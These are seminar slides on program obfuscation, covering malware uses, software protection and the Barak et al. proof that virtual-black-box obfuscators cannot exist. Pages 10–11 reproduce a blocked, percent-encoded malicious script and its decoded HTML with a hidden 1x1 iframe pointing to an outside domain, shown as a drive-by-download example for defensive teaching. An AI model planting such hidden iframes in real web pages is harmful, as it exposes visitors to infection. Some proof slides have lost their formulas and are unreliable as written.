Seminar in Cryptographic Protocols: Program Obfuscation Omer Singer June 8, 2009



Page 1: Seminar in Cryptographic Protocols:  Program  Obfuscation

Seminar in Cryptographic Protocols: Program Obfuscation

Omer Singer

June 8, 2009

Page 2: Seminar in Cryptographic Protocols:  Program  Obfuscation

Practical Background

Page 3: Seminar in Cryptographic Protocols:  Program  Obfuscation

What is program obfuscation?

• Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do.

• “The art of making things appear more complicated”

Page 4: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.oreillynet.com/pub/a/mac/2005/04/08/code.html

What does this function do?

Page 5: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Three main values:
  – Potency
  – Resilience
  – Cost

• Many methods in use:
  – Modify variable names and layout
  – Replace integer values with complex equations
  – Change program flow
  – Modify data structures
  – Anti-disassembly (“armored” viruses)
  – Anti-debugging
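As a small illustration of the first three methods in the list above, the sketch below places a readable function next to a hand-obfuscated equivalent. Both functions and all names are hypothetical and were written for this example; they are not taken from the slides or from any real obfuscation tool.

```python
def is_leap_year(year):
    """Readable version: the Gregorian leap-year rule."""
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)


def O0(l):
    """Hand-obfuscated equivalent of is_leap_year (illustrative only)."""
    # Meaningless names replace 'year' and the function name.
    # Constants hide behind arithmetic: 1 << 2 == 4, 10 * 10 == 100, 0x190 == 400.
    I = (1 << 2, 10 * 10, 0x190)
    # Control flow is rewritten as a loop driven by a state variable.
    o = 0
    while True:
        if o == 0:
            if l % I[0]:
                return False
            o = 2
        elif o == 2:
            if l % I[1]:
                return True
            o = 1
        else:
            return not l % I[2]


print(all(is_leap_year(y) == O0(y) for y in range(1, 3000)))
```

Both functions compute the same result for every year checked. Only the effort needed to read the second one changes, which is the trade-off that potency and cost are meant to measure.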

Page 6: Seminar in Cryptographic Protocols:  Program  Obfuscation

And now for some seriously obfuscated programs…

Page 7: Seminar in Cryptographic Protocols:  Program  Obfuscation

Winner of the International Obfuscated C Code Contest (IOCCC) in 1996

Shows the time on a clock with a configurable face and style

Page 8: Seminar in Cryptographic Protocols:  Program  Obfuscation

Winner of the International Obfuscated C Code Contest (IOCCC) in 2001

Network-based Pong game

#include <unistd.h> #include <curses.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #define o0(M,W) mvprintw(W,M?M-1:M,"%s%s ",M?" ":"",_) #define O0(M,W) M##M=(M+=W##M)-W##M #define l1(M,W) M.tv_##W##sec #define L1(m,M,l,L,o,O) for(L=l;L--;)((char*)(m))[o]=((char*)(M))[O] #define I1 lL,(struct sockaddr*)&il #define i1 COLS #define j LINES #define L_ ((j%2)?j:j-1) fd_set I;struct socka\ ddr_in il;struct host\ ent*LI; struct timeval IL,l;char L[9],_[1<<9] ;void ___(int __ ){_[__--]=+0;if( ++__)___(--__);_ [__]='=';}double o,oo=+0,Oo=+0.2; long O,OO=0,oO=1 ,ii,iI,Ii,Ll,lL, II=sizeof(il),Il ,ll,LL=0,i=0,li, lI;int main(int\ iL,char *Li[]){\ initscr();cbreak ();noecho();nonl ();___(lI=i1/4); _[0]='[';_[lI-1] =']';L1(&il,&_,\ II,O,+O,+lI);il. sin_port=htons(( unsigned long)(\ PORT&0xffff));lL =l_;if(iL=!--iL) {il. sin_addr .\ s_addr=0;bind(I1 ,II);listen(lL,5 );lL=accept(I1,& II);}else{oO-=2; LI=gethostbyname (Li[1]);L1(&(il. sin_addr),(*LI). h_addr_list[0],\ LI->h_length,iI, iI,iI);(*(&il)). 
sin_family=(&(*\ LI))->h_addrtype ;connect(I1,II); }ii=Ii=(o=i1*0.5 )-lI/2;iI=L_-1;O =li=L_*0.5;while (_){mvaddch(+OO, oo,' ');o0(ii,iI );o0(Ii,Il-=Il); mvprintw(li-1,Il ,"%d\n\n%d",i,LL );mvhline(li,+0, '-',i1);mvaddch( O,o,'*');move(li ,Il);refresh();\ timeout(+SPEED); gettimeofday(&IL ,+0);Ll=getch(); timeout(0);while (getch()!=ERR);\ if(Ll=='q'&&iL)\ write(lL,_+1,1); if(ii>(ll=0)&&Ll ==','){write(lL, _,-(--Il));}else if(Ll=='.'&&ii+\ lI<i1){write(lL, _+lI,++Il);}else if(iL||!Il)write (lL,_+lI-1,4-3); gettimeofday(&l, 0);II=((II=l1(IL ,)+(l1(l,u)-=l1( IL,u))-l1(l,)+(\ l1(l,)-=l1(IL,)) )<0)?1+II-l1(l,) +1e6+(--l1(l,)): II;usleep((II+=\ l1(l,)*1e6-SPEED *1e3)<0?-II:+0); if(Ll=='q'&&!iL) break;FD_ZERO(&I );FD_SET(lL,&I); memset(&*&IL,ll, sizeof(l));if((\ Ll=select(lL+1,& I,0,0,&IL)));{if (read(lL,&L,ll+1 )){if(!*L){ll++; }else if(*L==ll[ _]){ll--; }else\ if(*(&(*L))==1[_ ]){break;}}else{ break;}}O0(o,O); O0(O,o);if(o<0){ o*=-1;Oo*=-1;}if (o>i1){o=i1+i1-o ;Oo*=-1;}if(o>=( Ii+=ll)&&O<1&&oO <0&&o<Ii+lI){O=2 ;oO=~--oO;Oo+=ll *4e-1;}if(O<0){O =iI;LL++;}if(o>= (ii+=Il)&&O>iI-1 &&oO>0&&o<ii+lI){O=iI- 2;oO=~--oO;Oo+=Il*4e-1 ;}if(+O>+iI){O-=O;i++; }}endwin();return(0);}

Page 9: Seminar in Cryptographic Protocols:  Program  Obfuscation

No more fun and games…

Page 10: Seminar in Cryptographic Protocols:  Program  Obfuscation

Actual web code blocked by an Intrusion Prevention System at a client:

<Script Language='Javascript'><!--document.write(unescape('%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C%45%3E



Page 11: Seminar in Cryptographic Protocols:  Program  Obfuscation

When unobfuscated…

<HTML><HEAD><TITLE></TITLE></HEAD><BODY leftmargin=0 topmargin=0 rightmargin=0 bottommargin=0 marginheight=0 marginwidth=0>

<a href="http://www.efsoipaawa.com/ewioqa/"><IMG src="banner2.gif" width="302" height="252" border="0"></a>

<iframe src="http://lxczxo.info/mp/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe>
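The percent-encoded prefix of the blocked script can be decoded by hand. The sketch below uses Python's `urllib.parse.unquote`, which handles plain `%XX` sequences like these in the same way as the JavaScript `unescape` call in the script. Only the part of the string visible on the slide is decoded; the rest of the payload was not shown.

```python
from urllib.parse import unquote

# The encoded prefix exactly as it appears in the blocked script.
encoded = "%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C%45%3E"

# Each %XX pair is the hexadecimal code of one character.
decoded = unquote(encoded)
print(decoded)
```

The output is the opening `<HTML>`, `<HEAD>` and `<TITLE>` tags, each on its own line, which matches the start of the unobfuscated page.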


Page 12: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.finjan.com/Content.aspx?id=1456

Page 13: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.finjan.com/Content.aspx?id=1456

Page 14: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Obfuscation helps malware bypass antivirus software and delays the response of security researchers

• Obfuscated web code is often the first step in a “drive-by download” attack

• When the web code is executed by the browser it calls programs to target local software

• Result is infection of the user’s computer

Page 15: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 16: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://viruslist.com/en/analysis?pubid=204792056

Page 17: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://viruslist.com/en/analysis?pubid=204792056

Google Search Results Containing a Harmful URL

Page 18: Seminar in Cryptographic Protocols:  Program  Obfuscation

Attempt to calculate impact of obfuscated online attacks:

$13.2 billion direct damages of malware (1)

× 74% of malware spread via compromised websites (2)

× 80% of browser-based attacks are now obfuscated (3)

= $7.8 billion

(1) http://www.itu.int/ITU-D/cyb/cybersecurity/docs/itu-study-financial-aspects-of-malware-and-spam.pdf
(2) http://viruslist.com/en/analysis?pubid=204792056
(3) http://www.securityfocus.com/brief/846
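The estimate can be checked with a few lines of arithmetic. The sketch assumes, as the slide implicitly does, that the three figures can simply be multiplied. That is a rough simplification, and the variable names are chosen here for illustration.

```python
direct_damages_usd = 13.2e9   # direct damages of malware (source 1)
share_via_websites = 0.74     # malware spread via compromised websites (source 2)
share_obfuscated = 0.80       # browser-based attacks that are obfuscated (source 3)

# Rough estimate: damages attributable to obfuscated web-based attacks.
estimate = direct_damages_usd * share_via_websites * share_obfuscated
print(f"${estimate / 1e9:.1f} billion")
```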

Page 19: Seminar in Cryptographic Protocols:  Program  Obfuscation

Knowing is half the battle…

A few tips to stop obfuscated “drive-by download” attacks

• Use NoScript to block active content on Firefox

• Don’t click on web ads

• Keep client-side software updated: Adobe Reader, Flash Player, Apple Quicktime, etc.

Page 20: Seminar in Cryptographic Protocols:  Program  Obfuscation

Program obfuscation has some positive uses as well!

Page 21: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Preventing source code theft
  – Disrupt reverse engineering
  – Block code copying
  – Especially important with the increased use of Java and .NET languages such as C# and Visual Basic, which compile to easily decompiled intermediate code rather than machine code
  – Microsoft recommends obfuscating ASP files in case of server compromise

• Watermarking and Digital Rights Management (DRM)

Page 22: Seminar in Cryptographic Protocols:  Program  Obfuscation

“If obfuscation technology was ever perfected we would have perfect DRM and perfect malware. Yet, that outcome is unlikely. The computer ultimately has to decipher and follow a software program’s true instructions. Each new obfuscation technique has to abide by this requirement and, thus, will be able to be reverse engineered.”

- Chris Wysopal, “Good Obfuscation, Bad Code”

Page 23: Seminar in Cryptographic Protocols:  Program  Obfuscation


Page 24: Seminar in Cryptographic Protocols:  Program  Obfuscation

Oracle Access

• Used by [B+] to facilitate adversary model
• The oracle is some function f
• Adversary makes query q to the oracle, receives answer f(q)
• Useful when studying obfuscation: oracle serves as an interface to the program without exposing contents
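Oracle access can be sketched as a wrapper that answers queries without showing the code behind them. The class and function names below are hypothetical. Python does not actually prevent a caller from inspecting `_f`, so the hiding here is by convention only.

```python
from typing import Callable, List


class Oracle:
    """Wraps a function so callers can evaluate it but are not shown its code."""

    def __init__(self, f: Callable[[int], int]):
        self._f = f        # hidden from the adversary by convention
        self.queries = 0   # number of queries answered so far

    def query(self, q: int) -> int:
        self.queries += 1
        return self._f(q)


def adversary(oracle: Oracle) -> List[int]:
    """A toy adversary: it learns only the answers to the queries it makes."""
    return [oracle.query(q) for q in range(5)]


def secret_program(q: int) -> int:
    """Hypothetical program f that the oracle gives access to."""
    return (q * q + 3) % 7


oracle = Oracle(secret_program)
answers = adversary(oracle)
print(answers, oracle.queries)
```

Counting queries is a design choice made for this sketch: an efficient adversary can make only polynomially many of them, which is what limits how much it can learn.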

Page 25: Seminar in Cryptographic Protocols:  Program  Obfuscation

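[Figure: Adversary with Oracle Access. The adversary sends a query q to the oracle, which passes it to the program; the answer f(q) is returned from the program through the oracle to the adversary.]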

Page 26: Seminar in Cryptographic Protocols:  Program  Obfuscation

Virtual Black Box

Anything one can efficiently compute from the obfuscated program (the “virtual black box”), one should be able to efficiently compute given just oracle access to the program.

In other words, for any adversary A there exists a simulator S such that whatever A can learn given an obfuscated program, S can learn from oracle access to that program.

Page 27: Seminar in Cryptographic Protocols:  Program  Obfuscation

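[Figure: a black box with two properties, “Speaks Spanish” and “Answers in the form of a question”. Asked “Tell me about yourself”, it replies “¿Qué quieres saber?” (“What do you want to know?”).]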

Page 28: Seminar in Cryptographic Protocols:  Program  Obfuscation

[Figure: an adversary with access to the virtual black box, shown next to a simulator with oracle access to the function.]

Page 29: Seminar in Cryptographic Protocols:  Program  Obfuscation


In the [B+] paper on obfuscation, a circuit plays the role of a Turing machine restricted to inputs of a fixed, finite length.

Page 30: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Circuits are easier to put in a virtual black box.

• Therefore obfuscating circuits is easier than obfuscating TMs.

• The proofs in the [B+] paper first establish each theorem for TMs and then extend it to circuits.

Page 31: Seminar in Cryptographic Protocols:  Program  Obfuscation


• An obfuscator is an algorithm O that takes a program P and outputs O(P), restricting what an adversary can learn about P from O(P).

Page 32: Seminar in Cryptographic Protocols:  Program  Obfuscation

• What is the adversary trying to achieve?
  – A program that produces the same output as P
  – A program that produces output with some relation to the output of P
  – Compute some function of P
  – Decide some property of P

• The last goal is the weakest. Because we are proving impossibility, we want to show that an obfuscator cannot prevent even this.

Page 33: Seminar in Cryptographic Protocols:  Program  Obfuscation

General Impossibility Proof

Page 34: Seminar in Cryptographic Protocols:  Program  Obfuscation

TM Obfuscator

A probabilistic algorithm O is a TM obfuscator if the following conditions hold…

Page 35: Seminar in Cryptographic Protocols:  Program  Obfuscation


Functionality:

For every Turing machine M, the string O(M) describes a Turing machine that computes the same function as M.

Page 36: Seminar in Cryptographic Protocols:  Program  Obfuscation

Polynomial slowdown:

The description length and running time of O(M) are at most polynomially larger than those of M
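One common way to make this condition precise is sketched below. The polynomial $p$, the input $x$ and the step count $t$ are symbols introduced here for illustration.

$$
\exists \text{ a polynomial } p \text{ such that } \forall M:\quad |O(M)| \le p(|M|), \quad \text{and if } M \text{ halts on input } x \text{ within } t \text{ steps, then } O(M) \text{ halts on } x \text{ within } p(t) \text{ steps.}
$$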

Page 37: Seminar in Cryptographic Protocols:  Program  Obfuscation

“Virtual black box” property:

For any PPT A, there is a PPT S and a negligible function α such that for all TMs M

$$
\left| \Pr[A(O(M)) = 1] - \Pr[S^{M}(1^{|M|}) = 1] \right| \le \alpha(|M|)
$$

Page 38: Seminar in Cryptographic Protocols:  Program  Obfuscation

Circuit Obfuscator

• Same idea as TM Obfuscator but intuitively easier since a circuit computes a function with inputs of particular length

• Hence the proposition:

If a TM obfuscator exists, then a circuit obfuscator exists

• Thus if we prove impossibility for circuit obfuscators, impossibility of TM obfuscators follows

Page 39: Seminar in Cryptographic Protocols:  Program  Obfuscation

Unobfuscatable Circuit Ensemble

• A family of circuits such that:
  – Every circuit c in the family is efficient
  – There exists a predicate π(c) such that
    • π(c) is hard to compute with oracle access to the function that c computes
    • π(c) is easy to compute with access to any circuit c’ that computes the same function as c

Page 40: Seminar in Cryptographic Protocols:  Program  Obfuscation

Main Proof Structure

[B+] structure their proof of the main impossibility result as follows:

1. Define obfuscators that are secure when applied to two programs

2. Show that such obfuscators do not exist

3. Modify the construction to prove that TM/circuit obfuscators do not exist

4. Show how this proof yields an unobfuscatable function ensemble

Page 41: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 42: Seminar in Cryptographic Protocols:  Program  Obfuscation

2-TM Obfuscator

A 2-TM obfuscator is defined the same as a TM obfuscator but with a strengthened “virtual black box property”: the adversary has access to two obfuscated Turing machines.

Page 43: Seminar in Cryptographic Protocols:  Program  Obfuscation

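• Formal definition of the strengthened “virtual black box” property: for any PPT A, there is a PPT S and a negligible function α such that for all TMs M, N

$$
\left| \Pr[A(O(M), O(N)) = 1] - \Pr[S^{M,N}(1^{|M|+|N|}) = 1] \right| \le \alpha(\min\{|M|, |N|\})
$$

The first probability describes the adversary with access to two obfuscated TMs. The second describes the simulator with oracle access to the two TMs.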

Page 44: Seminar in Cryptographic Protocols:  Program  Obfuscation


According to [B+], “the essence of this proof is that there is a fundamental difference between getting oracle access to a function and getting the program that computes it, no matter how obfuscated”.

Page 45: Seminar in Cryptographic Protocols:  Program  Obfuscation

Proof by contradiction…

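• Suppose that there exists a 2-TM obfuscator O.

• Consider a function that cannot be learned by oracle queries, for example the following Turing machine, defined for strings α, β of length k:

$$
C_{\alpha,\beta}(x) = \begin{cases} \beta & \text{if } x = \alpha \\ 0^k & \text{otherwise} \end{cases}
$$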

Page 46: Seminar in Cryptographic Protocols:  Program  Obfuscation

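• Define another Turing machine that takes a program C as input, such that:

$$
D_{\alpha,\beta}(C) = \begin{cases} 1 & \text{if } C(\alpha) = \beta \\ 0 & \text{otherwise} \end{cases}
$$

• Consider an adversary A such that:

A(C, D) = D(C)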
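The construction can be sketched in a few lines of Python. Callables stand in for (obfuscated) Turing machines, integers stand in for k-bit strings, and 0 stands in for the all-zero string. The definitions of `make_C` and `make_D` follow the standard point-function construction and are an assumption about the equations on the original slides, which did not survive in the text. The all-zero machine `Z` is likewise introduced here for comparison.

```python
def make_C(alpha: int, beta: int):
    """C_{alpha,beta}: outputs beta on input alpha and 0 everywhere else."""
    return lambda x: beta if x == alpha else 0


def make_D(alpha: int, beta: int):
    """D_{alpha,beta}: takes a program C and outputs 1 iff C(alpha) == beta."""
    return lambda C: 1 if C(alpha) == beta else 0


def Z(x: int) -> int:
    """The all-zero machine, used only for comparison."""
    return 0


def A(C, D) -> int:
    """The adversary from the slide: run D on the code of C."""
    return D(C)


alpha, beta = 0x1234, 0xBEEF   # arbitrary secret values with beta != 0
C, D = make_C(alpha, beta), make_D(alpha, beta)
print(A(C, D), A(Z, D))
```

The adversary needs nothing more than the ability to hand one program to the other as input. That is exactly what holding the code allows and what oracle access does not.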

Page 47: Seminar in Cryptographic Protocols:  Program  Obfuscation

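Then for any α, β, writing $C_{\alpha,\beta}$ and $D_{\alpha,\beta}$ for the two Turing machines defined above:

$$
\Pr[A(O(C_{\alpha,\beta}), O(D_{\alpha,\beta})) = 1] = 1
$$

In contrast, for the machine $Z_k$ that always outputs $0^k$, and for α, β chosen uniformly at random from the strings of length k:

$$
\Pr[A(O(Z_k), O(D_{\alpha,\beta})) = 1] = 2^{-k}
$$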

Page 48: Seminar in Cryptographic Protocols:  Program  Obfuscation

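Therefore S with oracle access to $C_{\alpha,\beta}$ and $D_{\alpha,\beta}$ (the two machines defined above) must output 1, and S with oracle access to $Z_k$ (the machine that always outputs $0^k$) and $D_{\alpha,\beta}$ must output 0. But with only polynomially many oracle queries S cannot differentiate between the two cases, except with negligible probability, so we have a contradiction.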
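The simulator's difficulty can be illustrated with a toy experiment. The sketch below shows one hypothetical black-box strategy, not a proof about all simulators. It also simplifies the setting by giving the simulator only the oracle for the first machine, since an oracle for D is of little use without a program that already maps α to β. The parameter `K`, the query budget and the seeds are arbitrary choices for this example.

```python
import random

K = 64  # toy security parameter (bit length of alpha and beta)


def make_C(alpha, beta):
    """Point function: beta on input alpha, 0 everywhere else."""
    return lambda x: beta if x == alpha else 0


def Z(x):
    """All-zero function."""
    return 0


def simulator(oracle, budget, rng):
    """Black-box strategy: query random inputs, output 1 if any answer is nonzero."""
    for _ in range(budget):
        if oracle(rng.getrandbits(K)) != 0:
            return 1
    return 0


secret = random.Random(2009)
alpha, beta = secret.getrandbits(K), secret.getrandbits(K) | 1  # beta is nonzero

# Same random queries against both oracles.
out_C = simulator(make_C(alpha, beta), budget=10_000, rng=random.Random(1))
out_Z = simulator(Z, budget=10_000, rng=random.Random(1))
print(out_C, out_Z)
```

Each random query hits α with probability 2^-64, so with 10,000 queries the two runs differ only with probability about 10,000 / 2^64. The simulator therefore behaves identically on both oracles, whereas an adversary holding the code distinguishes them with a single evaluation.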

Page 49: Seminar in Cryptographic Protocols:  Program  Obfuscation

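Together, these equations contradict the assumption that O is a 2-TM obfuscator: the adversary A tells the two pairs of obfuscated machines apart almost perfectly, while no simulator S with only oracle access can.

Recall that a 2-TM obfuscator O is defined with the “virtual black box” property that, for any PPT A, there is a PPT S and a negligible function α such that for all TMs M, N:

$$
\left| \Pr[A(O(M), O(N)) = 1] - \Pr[S^{M,N}(1^{|M|+|N|}) = 1] \right| \le \alpha(\min\{|M|, |N|\})
$$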

Page 50: Seminar in Cryptographic Protocols:  Program  Obfuscation

In the [B+] paper, the proof that 2-TM obfuscators do not exist is extended to show that 2-circuit obfuscators also do not exist.

Page 51: Seminar in Cryptographic Protocols:  Program  Obfuscation

TM Obfuscator

• [B+] extend the two-program obfuscation impossibility result to single program obfuscation.

• The extension is based on the ability to combine functions/TMs

Page 52: Seminar in Cryptographic Protocols:  Program  Obfuscation

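In [B+] the combination of two functions $f_0, f_1$ is defined as $(f_0 \# f_1)(b, x) = f_b(x)$, where $b \in \{0, 1\}$.

A program C is decomposed into $C_0, C_1$ by setting $C_b(x) = C(b, x)$.

By this definition, having oracle access to a combined function $f_0 \# f_1$ is the same as having oracle access to $f_0$ and $f_1$ individually.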
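Combination and decomposition are simple enough to sketch directly. The code assumes the standard definition in which a selector bit b chooses which of the two functions is evaluated. The helper names and the two example functions are hypothetical.

```python
def combine(f0, f1):
    """Return the combined function (b, x) -> f_b(x)."""
    return lambda b, x: f1(x) if b else f0(x)


def decompose(C):
    """Split a combined program C into (C_0, C_1), where C_b(x) = C(b, x)."""
    return (lambda x: C(0, x)), (lambda x: C(1, x))


def double(x):   # hypothetical f_0
    return 2 * x


def square(x):   # hypothetical f_1
    return x * x


F = combine(double, square)
C0, C1 = decompose(F)
print(F(0, 5), F(1, 5), C0(5), C1(5))
```

Decomposition uses the combined program only by calling it with a fixed first argument. That is why oracle access to the combination gives exactly the same power as oracle access to both parts.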

Page 53: Seminar in Cryptographic Protocols:  Program  Obfuscation

Theorem: TM obfuscators do not exist.

The adversary A is the same as before only modified to decompose the program that it receives.

Page 54: Seminar in Cryptographic Protocols:  Program  Obfuscation

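Suppose for the sake of contradiction that there exists a TM obfuscator O.

Give A the obfuscation of a single combined machine: either the two machines from the 2-TM proof combined into one, or the same combination with the first machine replaced by the all-zero machine. After decomposing its input, A outputs 1 with probability 1 in the first case and with probability only 2^-k in the second, whereas a simulator S with oracle access to the combined machine cannot tell the two cases apart.

These equations contradict the virtual black-box property required for O being a TM obfuscator.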

Page 55: Seminar in Cryptographic Protocols:  Program  Obfuscation

• In [B+] this proof is extended to circuit obfuscators.

• The challenge with extending to circuit obfuscators is greater than expected
  – The size of a circuit is greater than its input length, so one circuit cannot simply take the other as input
  – Adapt the proof using homomorphic encryption


Page 56: Seminar in Cryptographic Protocols:  Program  Obfuscation

Unobfuscatable Circuit Ensembles

• The case against obfuscators is further strengthened by proving the existence of unobfuscatable circuit ensembles.

Page 57: Seminar in Cryptographic Protocols:  Program  Obfuscation

The unobfuscatable circuit ensemble is defined as


Page 58: Seminar in Cryptographic Protocols:  Program  Obfuscation

We can now show that given any circuit that computes the same function as , we can reconstruct the latter.

• Since D’ computes the same function as D and , we have

• We can now reconstruct

Page 59: Seminar in Cryptographic Protocols:  Program  Obfuscation

Indistinguishability Obfuscator

• Obfuscation models weaker than the “virtual black box” may still be useful for software protection

• Indistinguishability obfuscator: Obfuscations of equivalent circuits of the same size should be computationally indistinguishable.

• The impossibility proof above does not rule out this model, and later works have proposed candidate constructions for it

Page 60: Seminar in Cryptographic Protocols:  Program  Obfuscation

Software Watermarking

We would like to be able to “watermark” a program such that the code will always have a certain identifier that cannot be removed.

Page 61: Seminar in Cryptographic Protocols:  Program  Obfuscation

• A good software watermarking scheme should have the following properties:
  – Functionality: The marked program computes the same function as the original program.
  – Meaningfulness: Most other programs don’t have this marking.
  – Fragility: It is infeasible to remove the mark from the program without (substantially) changing its behavior.

• [B+] sought to formalize the watermarking problem as it relates to obfuscation.

Page 62: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 63: Seminar in Cryptographic Protocols:  Program  Obfuscation

• [B+] sketch a proof showing that no such watermarking scheme exists.

• For any unobfuscatable program, we know that an adversary will be able to take the obfuscated (marked) program and reconstruct the (unmarked) source code.

Page 64: Seminar in Cryptographic Protocols:  Program  Obfuscation


• [B+] have made progress in formalizing the concept of program obfuscation.

• They have shown that the “virtual black box” paradigm is impossible to satisfy.

• Somewhat strong obfuscation of some programs remains a possibility

Page 65: Seminar in Cryptographic Protocols:  Program  Obfuscation

Final Thoughts

• Program obfuscation has an increasingly important role in the race between hackers and the information security community.

• Additional research is needed to make malware detection more effective.

• Significant progress in obfuscation techniques may break the current signature-based detection model.

Page 66: Seminar in Cryptographic Protocols:  Program  Obfuscation

Thanks for listening!